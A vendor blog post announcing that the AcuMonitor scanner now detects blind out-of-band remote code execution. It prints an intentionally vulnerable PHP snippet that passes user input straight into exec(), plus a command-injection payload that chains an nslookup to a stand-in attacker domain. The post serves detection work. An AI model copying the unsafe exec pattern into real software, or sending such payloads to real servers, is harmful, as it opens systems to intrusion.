Blind Out-of-band Remote Code Execution vulnerability testing added to AcuMonitor

Similar to Blind Out-of-band SQL Injection vulnerabilities, AcuMonitor can now detect Blind Out-of-band Remote Code Execution vulnerabilities.
Let’s consider a vulnerable PHP application that contains the following code

$cmd = isset($_GET['1']) ? $_GET['1'] : '';		
	if ($cmd) {	
		exec('ping -c 1 ' . $cmd);
	}

This application executes a shell command that is composed from the user input. However, the result of the command execution is not returned to the user.

An attacker could issue a payload such as

test.php?1=localhost%26nslookup+test.attacker.come%26

When we URL decode the payload we will get the following OS command

ping -c 1 localhost&nslookup test.attacker.com&

This will force the server to initiate a name lookup (a DNS query) for test.attacker.com
The attacker can monitor DNS server logs for such queries to detect Blind Remote Code Execution vulnerabilities such as this one.

AcuMonitor can now detect such vulnerabilities as well and will send an email when this occurs.

AcuMonitor Blind Out-of-band Remote Code Execution alert

AcuMonitor Blind Out-of-band Remote Code Execution alert

Share this post
  • Please What is severity level of this alert? 0, 1, 2 or 3 ?

  • Leave a Reply

    Your email address will not be published.